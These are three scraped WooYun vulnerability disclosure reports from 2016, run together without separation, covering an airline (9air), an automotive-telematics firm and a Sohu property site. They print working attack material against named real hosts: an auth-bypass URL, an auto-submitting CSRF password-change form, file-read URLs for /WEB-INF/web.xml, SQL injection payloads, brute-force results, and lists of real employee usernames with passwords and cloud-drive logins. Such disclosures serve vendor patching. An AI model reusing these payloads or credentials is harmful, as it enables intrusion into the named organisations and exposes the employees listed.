漏洞详情披露状态： 2016-05-05： 细节已通知厂商并且等待厂商处理中2016-05-05： 厂商已经确认，细节仅向厂商公开2016-05-15： 细节向核心白帽子及相关领域专家公开2016-05-25： 细节向普通白帽子公开2016-06-04： 细节向实习白帽子公开2016-06-19： 细节向公众公开简要描述：看到九元航空在乌云上注册了, 就测试一下详细说明：#1 邮箱信息收集+泄漏密码采集, 获取一下邮箱帐号http://mail.9air.com/code 区域[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */9air.com[email protected]/* */jyh9air.com[email protected]/* */8air.com[email protected]/* */8air.com[email protected]/* */8air.com[email protected]/* */8air.com[email protected]/* */8air.com[email protected]/* */8air.com[email protected]/* */9air.com2015[email protected]/* */9air.com2015[email protected]/* */9air.com2015泄漏敏感文件、通讯录、内网信息和监控信息等#2 业务逻辑code 区域http://sms.9air.com/oa!aircrewLogin?username=DingJun&airuser.aircrewName=丁军&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A 直接进去了 分析后, 发现username、airuser.aircrewName、airuser.aircrewDepartment.aircrewDeptCode三个正确就可以进去了 实例1: http://sms.9air.com/oa!aircrewLogin?username=sms&airuser.aircrewName=SMS&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A 实例2: http://sms.9air.com/oa!aircrewLogin?username=gaoweixing&airuser.aircrewName=高卫星&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=ASMS高卫星crew系统修改密码处code 区域http://crew.9air.com/personal_change_password.jspcode 区域<!doctype html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="Generator" content="EditPlus®"> <meta name="Author" content=""> <meta name="Keywords" content=""> <meta name="Description" content=""> <title>Document</title> </head> <body> <form method="post" action="http://crew.9air.com/personal_change_password.jsp" id="edit"> <input name="newPass" type="text" value="9air.com1"> <input name="validPass" type="text" value="9air.com1"> </form> </body> <script> document.getElementById("edit").submit(); </script> </html>Crew系统, 修改密码处未验证验证原密码, 结合邮箱, 可CSRF实现密码修改#3 文件读取code 区域sms.9air.com/reqManagement.action?fileName=web.txt&&fileAddr=/WEB-INF/web.xml sms.9air.com/reqManagement.action?fileName=web.txt&&fileAddr=/WEB-INF/titlees/log4j.properties#4 SQL注入code 区域http://oa.9air.com:8081//services/举例1' or 'a'='a 结果为41' or 'a'='b 结果为5用户名长度具体可参考WooYun: 泛微协同商务系统e-cology某处SQL注入（附验证中转脚本） WooYun: 泛微OA某接口无需登录可执行任意SQL语句（附脚本） #5 帐号体系控制不严, 进入多个系统http://crew.9air.com/code 区域dingjun 9air.com zhaohaili wangxiong lixiaoming chenli chenhao lijinglin caoyuanhe zhangben liuyongqiang jiazhenxiu lijiayi 888888 wangren liuguangping limengkan shizhaojin fengbo jiangchao yangsibo zhuxingyan songyuan yangxiangdong wangqi wangyao wuyuhao houfeiyu liuyiming hudongli caoning yangjin yangyidong fuyu chenweibin caoyuanhe yangjian chenyupei wenxudong sunshina liujingwen zhaoyafang yanyu zhangxinyu cuiyongtao qiaozhu lijiaming zhaodongchen hejian hanfanliang changxiaobo xulihao fangxiangyun maquan xiaohaodi wangyiran lichaoa liangshuang tianmeng liuquan huqigang yangqining heli 8air.com gechunlian abc123456 liyuzhu 123456 hejiangtao 123456 liuyingbing a123456oa.9air.com举例说明, 还有很多的code 区域高卫星 9air.com 关锋 9air.comhttp://203.156.207.29:8080/mes/code 区域Payload1 Payload2 Status Length niejiangnan aaaa 200 18830 yanjun 123456 200 15292 luochihong aaaa 200 8547 xuweibiao aaaa 200 8350 huanghe aaaa 200 8344 yiniansheng aaaa 200 7868 wangchunhui aaaa 200 1035 sujianlin aaaa 200 1033 liusiqi aaaa 200 1031 xuqinghai aaaa 200 1030#5 外围信息code 区域微云 [email protected]/* */密码：dingjianchejian百度云 [email protected]/* */,密码：9air.com；[email protected]/* */，密码：9air.com 漏洞证明：已证明！修复方案：1、邮箱弱密码不能只是发邮件, 是否可以强制修改2、业务逻辑部分, 重新设计一下3、OA的SQL注入问题, 联系泛微吧4、多个系统账户体系问题, 添加验证码+修改弱口令5、你们更专业版权声明：转载请注明来源 harbour_bin@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-05-05 15:48厂商回复：万恶的弱密码。最新状态：暂无

漏洞详情披露状态： 2016-05-01： 细节已通知厂商并且等待厂商处理中2016-05-01： 厂商已经确认，细节仅向厂商公开2016-05-11： 细节向核心白帽子及相关领域专家公开2016-05-21： 细节向普通白帽子公开2016-05-31： 细节向实习白帽子公开2016-06-15： 细节向公众公开简要描述：思建科技 专注于车联网领域的技术研究与互联网运营服务，是一家技术创新、实力雄厚、并拥有完全自主知识产权的高科技企业详细说明：某员工邮箱弱口令 Git上的 code 区域[email protected]/* */cst2015内部组织架构及企业通讯录 漏洞证明：上万封邮件大量账号密码泄露code 区域hi~ 以下数据库以拥有增删改查权限的临时用户uat_tmp密码也是uat_tmp。mask 区域*****/appse***** *****.206/***** *****25/cre***** *****.229/***** *****10/ope***** *****/cmds_r***** *****0.6/***** *****.54/c***** *****.212/***** *****.212/***** *****11.2*****  code 区域hi~all 以下为2016年2月29日-2016年3月12日将对以下应用对应访问数据库账号进行改造。 请各位知悉，并对未在以下表格中的应用进行统计。 优先更改2月29-3月9日升级的应用。3月9日以后将推动更改，预计在3月12日内完成。 更改前，由王游发起更改通知，并下发新用户名密码，经三思审核后，在计划中进行更改和验证。 数据库地址 数据库名 应用地址 应用名mask 区域*****gdcp.kartor.c***** *****bi-02.gdcp***** *****er 172.31.0***** *****rver_ticke***** *****172.31.11.***** *****eap 172.***** *****er 172.31.0***** *****server 17***** *****server 17***** *****server 17***** *****server 17***** *****server 17***** *****server 17***** *****server 17***** *****server 17***** *****server 17***** *****ket 172.31.0.9***** *****er 172.31.1***** *****server 17***** *****er 172.31.1***** *****server 17***** *****er 172.31.0***** *****server 17***** *****server 17***** *****e 172.31.11.***** *****er 172.31.1***** *****_cash 172.31.***** *****cket_cash 1***** *****172.31.11.***** *****er 172.31.0***** *****server 17***** *****er_ticket 1***** *****server 17***** *****_coupon 172.3***** *****cket_coupon***** *****31.11.68 cst***** *****mds 172.***** *****31.10.201 cs***** *****mds 172.***** *****1.10.223 cst***** *****bi 172.3***** *****dit 172.3***** *****dit 172.3***** *****72.31.11.108***** *****napi 172.***** *****2.31.10.227 c***** *****bi 172.3***** *****bi 172.3***** *****2.31.10.231***** *****eap 172.***** *****eap 172.***** *****mds 172.***** *****mds 172.***** *****wcalc 172***** *****wcalc 172***** *****172.31.11.***** *****72.31.11.56 ***** *****flow 172.***** *****flow 172.***** *****flow 172.***** *****172.31.11.***** *****eap 172.***** *****redit 17***** *****redit 17***** *****icket 172.31.***** *****server 17***** *****server 17***** *****er_ticket 1***** *****server 17***** *****server 17***** ***** 172.31.11.1***** *****er_ticket 1***** *****server 17***** *****server 17***** *****172.31.11.***** *****172.31.11.***** *****2.31.11.72 ***** *****172.31.11.***** *****p 172.31.***** *****eap 172.***** *****eap 172.***** *****bi 172.3***** *****bi 172.3***** *****bi 172.3***** *****dit 172.3***** *****dit 172.3***** *****dit 172.3***** *****2.31.11.230***** *****mds 172.***** *****_ticket 172.***** *****server 17***** *****server 17***** *****server 17***** *****server 17***** *****er_ticket 1***** ***** 172.31.11.1***** *****est 172.***** *****172.31.11.***** *****mds 172.***** *****31.11.45 obd***** *****mds 172.***** *****_ticket 172.***** *****server 17***** ***** 172.3***** *****ss 172.3***** ***** 172.31.11.1***** *****er_ticket 1***** *****server 17***** ***** 172.31.0***** *****ms 172.3***** *****72.31.11.214***** ***** 172.31.0***** *****ps 172.3***** *****ps 172.3***** *****rver 172.3***** *****rver_ticke***** *****server 17***** *****rver_ticke***** *****server 17***** *****server 17***** *****er_ticket 1***** *****server 17***** *****rver 172.3***** *****server 17***** *****eap 172.***** *****eap 172.***** *****.31.11.214 ***** *****mds 172.***** *****er 172.31.1***** *****er_ticket 1***** *****w 172.31.11*****  code 区域数据库帐号密码-lv7修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：15确认时间：2016-05-01 16:01厂商回复：您好，问题已经确认，问题已经修复。感谢您对思建科技安全的关注和支持。最新状态：暂无

漏洞详情披露状态： 2016-04-30： 细节已通知厂商并且等待厂商处理中2016-04-30： 厂商已经确认，细节仅向厂商公开2016-05-10： 细节向核心白帽子及相关领域专家公开2016-05-20： 细节向普通白帽子公开2016-05-30： 细节向实习白帽子公开2016-06-14： 细节向公众公开简要描述：搜狐某站修复不当继续SQL注入详细说明： code 区域http://house.focus.cn/common/yaohao/checkkh.php?yh_id=257&kh=code 区域注入参数#kh条件为true时code 区域http://house.focus.cn/common/yaohao/checkkh.php?yh_id=257&kh=-1' OR 3*2=6 AND 000498=000498 or '7EorGOZw'='条件为false时 漏洞证明：看了下，过滤了双引号之类的code 区域apostrophenullencode.py 修复方案：继续过滤把版权声明：转载请注明来源 Aasron@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：8确认时间：2016-04-30 09:52厂商回复：感谢支持最新状态：暂无